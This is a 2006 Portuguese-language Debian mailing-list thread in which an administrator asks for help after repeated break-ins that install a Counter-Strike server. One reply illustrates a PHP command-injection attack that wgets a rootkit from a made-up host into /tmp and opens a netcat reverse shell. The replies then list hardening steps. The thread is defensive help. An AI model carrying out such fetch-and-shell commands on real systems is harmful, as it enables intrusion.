RES: Invasão... Cstrike
Caros amigos...
Agradeço a grande demanda de respostas e opniões.. estou em processo de
testes de tudo que me passaram... assim que obtiver alguma resposta do
ocorrido (ou outra dúvida :-P) retorno a todos.
Muito grato
Daniel
-----Mensagem original-----
De: Simon Rocher [mailto:simon.rocher@yahoo.com]
Enviada em: segunda-feira, 13 de novembro de 2006 15:23
Para: debian-user-portuguese@lists.debian.org
Assunto: Re: Invasão... Cstrike
Jah rolou comigo tb...
Eh dificil garantir a seguranca dos scripts (seja em qual linguagem for) uma
vez que nao eh vc quem esta desenvolvendo.
Mas no caso em questao, eu ainda acho q pode ser um usuario da rede jogando
em um server fora da sua rede
e vc estah se confundindo hehehe
Como vc disse soh existem poucas portas abertas... e as do CS nao estao
entre elas.
vc pode ver se tem o processo do CS rodando na maquina...
se bem q se o cara entrou e conseguiu ateh subir um server de cs, ele
poderia ter instalado um rootkit
com um programa ps por ex, q nao liste os processos dem um user q ele tenha
criado.
Mas acho q nao eh este o caso.
Abracos
----- Original Message ----
From: Sergio Lopes <sergioll@gmail.com>
To: Simon Rocher <simon.rocher@yahoo.com>
Cc: wpqa@credicardciti.com.br; Vinicius Andrade Marino
<vinicius777@gmail.com>; debian-user-portuguese@lists.debian.org
Sent: Monday, November 13, 2006 4:14:08 PM
Subject: Re: Invasão... Cstrike
Caros,
No meu caso aconteceu o que o Simon explicou.
O cara que configurou o servidor não acertou a parte de segurança
permitindo que um usuario mal intencionado executasse um script.
O pior que o cara foi dar uma de gostosão instalando o Slackware
porque é bme seguro. Mas não adianta vc ter uma distribuição segura,
mas vc não corrige as falhas.
Eu aconselharia vc a refazer o servidor
Abs,
Sérgio
On 11/13/06, Simon Rocher <simon.rocher@yahoo.com> wrote:
> Varios sao os motivos:
>
>
>
>
> Imagina o seguitne, um exemplo bemmmm besta, e bemmm looser, nunca faca
isso :)
>
> imagine q vc tem um php q execute uma chamada system
> e o comando vem de um get ou de um post , e vc tem register_globals = on
no seu php.ini
>
> pronto, o cara pode ver este seu script e executar qq comando na sua
maquina...
>
> vamos supor ainda, q o cara executou um wget
http://ksjdaskljskla.com/rootkit.tar.gz pra dentro do seu dir /tmp
>
> depois descompactou, e rodou um netcat, ou um bot de IRC
>
> no caso com o netcat ele poderia estabelecer uma conexao com uma maquina
dele ex:
>
> MAQUINA DO CARA Seu servidor, saindo
com o netcat pra porta 80 do cara...
> OUVINDO NA PORTA 80 <<<<<============
> COM O NETCAT
>
>
> no caso acima o cara jah pega shell na maquina... mas vc ainda consegue
ver onde ele mandou seu server
> se conectar para ele pegar a shell...
>
>
> mas se o cara iniciou um bot de irc por ex na sua maquina, e este bot
> se conecta a qq rede de irc, ele pode entrar na rede de irc e mandar
comandos pro seu server
> atravez deste bot...
>
>
> o que fazer pra evitar isso ?
> sao varias as opcoes, depende da usabilidade q precisa:
> 1- apt-get install bastille
> Edite o script de firewall dele, e siga as instrucoes para habilitar o
controle
> de saida do firewall.
> Assim, se o cara tentar baixar algum arquivo ou fazer um fopen de um
stream ftp/http q seja, ele nao vai conseguir...
> Habilitar isso eh BEEEEM chato, pois sempre q vc precisar fazer um
include de um stream precisa ter a regra no firewall do bastille, alem de
ter q colocar os ips da sua rede, de servers NTP, dos sources do debian etc.
>
> 2 - instale o mod_security e configure para as suas necessidades
> ele jah vem com algumas regras q vc pode habilitar, distribuidas em 3
nives de 'paranoia'
>
> 3 - aplique o patch do grsecurity no seu kernel, fica 'duca', vc sabe
absolutamente tdo q ocorre na maquina, e pode controlar
> tdo com o PAX por ex.
>
> 4 - coloque algum auditor de arquivos (tripwire por ex) e grave o banco de
dados dele em um CD-R, para evitar q banco de dados dele seja alterado.
>
> 5 - seja rigoroso com as permissoes de arquivos
>
> 6 - desligue o register_globals do php.ini
>
> 7 - LIGUE o safe_mode do php.ini
>
>
> isso tdo jah da um talento legal...
>
> as 3 ultimas sao as mais simples, e mais faceis de implementar.
>
>
> abracos
>
>
>
>
> ----- Original Message ----
>
> From: "wpqa@credicardciti.com.br" <wpqa@credicardciti.com.br>
>
> To: Vinicius Andrade Marino <vinicius777@gmail.com>
>
> Cc: debian-user-portuguese@lists.debian.org
>
> Sent: Monday, November 13, 2006 4:19:21 PM
>
> Subject: Re:Invasão... Cstrike
>
>
>
>
>
> Opa! Fiquei curioso, não opiniei até agora por desconhecer alguma forma de
auxiliar, mas, pq o uso do PHP no WEBServer(Apache) pode permitir isto? O
quê deveria ser travado?
>
>
>
> Wagner Eduardo Bidin
>
> Credicard Banco S/A
>
> VP Controles Internos
>
> WPQA
>
> 55 11 3047.9089
>
> wpqa@credicard.com.br
>
>
>
>
>
> Vinicius Andrade Marino <vinicius777@gmail.com> 13/11/2006 13:47
>
> To
>
> debian-user-portuguese@lists.debian.org cc
>
>
>
> Subject
>
> Re: Invasão... Cstrike
>
>
>
>
>
>
>
>
>
>
>
>
>
> Pelo o que pude notar o invasor conseguiu acesso por web !
>
> apenas me diga isso...
>
> Qual aplicação roda no web-server ?(aposto que seria um php!)
>
> Qual versão do kernel está rodando atualmente ?
>
> E se caso lhe interesse passar as dores de cabeça faça assim:
>
> procure o log de acesso do apache e filtre o conteudo assim.
>
> cat access_log |grep cmd= |less
>
> logo descubrirá o conteudo e tente executar você mesmo !
>
>
>
>
>
>
>
> Em Segunda 13 Novembro 2006 14:39, Paulo de Souza Lima escreveu:
>
> > É bão tb. :-)
>
> >
>
> > Paulo de Souza Lima
>
> > Curitiba/PR
>
> > Linux User 432358
>
> >
>
> > ----- Mensagem original ----
>
> > De: Anacleto Pavão <anacletopavao@yahoo.com.br>
>
> > Para: Paulo de Souza Lima <paulocwb2003@yahoo.com.br>; Lista Debian
>
> > <debian-user-portuguese@lists.debian.org> Enviadas: Segunda-feira, 13
de
>
> > Novembro de 2006 11:29:20
>
> > Assunto: Re: Invasão... Cstrike
>
> >
>
> > Nao seria interessante instalar e configurar o SNORT?
>
> >
>
> > Paulo de Souza Lima <paulocwb2003@yahoo.com.br> escreveu: A
maioria
>
> > das invasões são facilitadas por pessoas ou equipamentos dentro da
empresa.
>
> >
>
> > Sugiro que você verifique se há algum desktop infectado, pois ele pode
>
> > estar monitorando a rede de alguma outra máquina. Outra boa idéia é
fazer a
>
> > varredura pesada das portas de fora para dentro e de dentro para fora
com o
>
> > nmap (de fora pra dentro você vai ter de pedir para alguém fazer).
Também é
>
> > uma boa idéia copiar os logs para outra máquina. Outra coisa: vc tem
>
> > certeza de que sua rede não tem backdoors (como acessos adsl ou
discados
>
> > que não passem pelo firewall, ou ainda, mais de um IP externo no
firewall)?
>
> >
>
> > Me esclarece uma coisa: Ele instalou esse servidor de Counter Strike no
>
> > firewall ou num servidor interno à rede?
>
> >
>
> > Abraços,
>
> >
>
> > Paulo de Souza Lima
>
> > Curitiba/PR
>
> > Linux User 432358
>
> >
>
> > ----- Mensagem original ----
>
> > De: Daniel <da_picon@yahoo.com.br>
>
> > Para: Lista Debian <debian-user-portuguese@lists.debian.org>
>
> > Enviadas: Segunda-feira, 13 de Novembro de 2006 9:38:19
>
> > Assunto: Invasão... Cstrike
>
> >
>
> > <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, >
div.MsoNormal >
{margin:0cm;margin-bottom:.0001pt;font-size:12.0pt;font-family:"Times New >
Roman";}a:link, span.MsoHyperlink >
{color:blue;text-decoration:underline;}a:visited, span.MsoHyperlinkFollowed
> {color:purple;text-decoration:underline;} span.EstiloDeEmail17 >
{font-family:Arial;color:windowtext;}_filtered {margin:70.85pt 3.0cm >
70.85pt 3.0cm;}div.Section1 {}--> Olá pessoal.
>
> >
>
> > Estou com um problema sério em minha rede.
>
> > Semana passada estava dando uma olhada nos logs como de costume e vi
que
>
> > o log de saída estava enorme (2 Gb). Fui investigar e vi que alguém
invadiu
>
> > o meu server e criou um servidor de jogo Counter Strike nele. O
Engraçado é
>
> > que as únicas portas abertas de entrada são a 80 e uma de ssh
alternativa.
>
> >
>
> > Bom, tentei vasculhar como o cara entrou, mas não encontrei nada.
>
> > Resolvi refazer o servidor todo. (2 dias de trabalho). Bom, voltei do
final
>
> > de semana e lá estava tudo de novo. Não consigo entender como o cara
>
> > entrou, formatei a máquina, mudei as senhas, tem apenas as duas portas
>
> > abertas, mas ta tudo lá. O Login e root está desabilitado para ssh...
>
> > enfim, não sei o que o cara fez. E pra piorar, o desgraçado apagou os
logs
>
> > todos.
>
> >
>
> > Alguém já passou por algo do tipo, com esses servers de counter
strike?
>
> > Há algo padrão a se fazer?
>
> > Estou completamente perdido, qualquer dica, ajuda, sei lá, seria bem
>
> > vindo.
>
> >
>
> > Grato a todos
>
> >
>
> > Daniel
>
> >
>
> >
>
> >
>
> >
>
> >
>
> >
>
> >
>
> >
>
> >
>
> > O Yahoo! está de cara nova. Venha conferir!
>
> >
>
> >
>
> >
>
> > Yahoo! Acesso Grátis - Internet rápida e grátis. Instale o discador
agora!
>
> >
>
> >
>
> >
>
> >
>
> >
>
> >
>
> >
>
> > _______________________________________________________
>
> > Novidade no Yahoo! Mail: receba alertas de novas mensagens no seu
celular.
>
> > Registre seu aparelho agora! http://br.mobile.yahoo.com/mailalertas/
>
>
>
> --
>
> keepTec - Consultoria de Sistemas Linux - +55 (11)95002638 -
keeptec@gmail.com
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
--
_
°v° Sérgio Lopes- Analista de Sistema
/(_)\ São Paulo - SP - BRAZIL
^ ^ Linux user number 373166
_______________________________________________________
O Yahoo! está de cara nova. Venha conferir!
http://br.yahoo.com
Reply to: